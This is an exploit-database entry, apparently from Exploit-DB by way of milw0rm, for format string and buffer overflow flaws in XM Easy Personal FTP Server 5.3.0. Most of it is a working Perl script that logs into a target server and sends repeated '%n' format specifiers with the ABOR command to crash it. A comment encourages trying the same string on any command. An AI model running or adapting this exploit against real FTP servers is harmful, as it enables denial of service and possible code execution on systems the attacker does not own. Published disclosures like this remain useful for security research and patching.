header-logo
Suggest Exploit
vendor:
XM Easy Personal FTP Server
by:
Umesh Wanve
N/A
CVSS
N/A
Multiple format string attacks, Multiple buffer overflow
Unknown
CWE
Product Name: XM Easy Personal FTP Server
Affected Version From: 5.3.2000
Affected Version To: 5.3.2000
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2007

XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities

Multiple format string attacks and buffer overflow vulnerabilities exist in XM Easy Personal FTP Server version 5.3.0. These vulnerabilities can be exploited to crash the server and potentially execute code. Every command in the server is vulnerable to these attacks. It is recommended to use a custom fuzzer to fuzz the server for better results.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#=========================================================================================================
#                XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities
#                                   By Umesh Wanve 
#=========================================================================================================
#
# Vendor: http://www.dxm2008.com/
#
#  Date: 28-02-2007
#
#
# 1) Multiple format string attacks. Every command is vulnerable.
#    With only single % also the server crashes.
# 
# 2) Multiple buffer overflow occurs in commands if we fuzz the server( Better way use ur own fuzzer)
#   
# 
#    Code execution is possbile. 
#    This is latest version of FTP server. 
#
# ###########################################################################################

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "test";
my $pass = "test";


$exploit_string = "%n" x 10;


print ":: Trying to connect to target system at: $target...\n"; 

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";

print "Connected!\n";

$ftp->login($user, $pass) || die "could not login: $!"; 
print "Logged in!\n";

$ftp->command("ABOR ",$exploit_string);                   # Every command is vulnerable. Use it what u like :)
print "Done!\n";

$ftp->quit; 

# milw0rm.com [2007-02-28]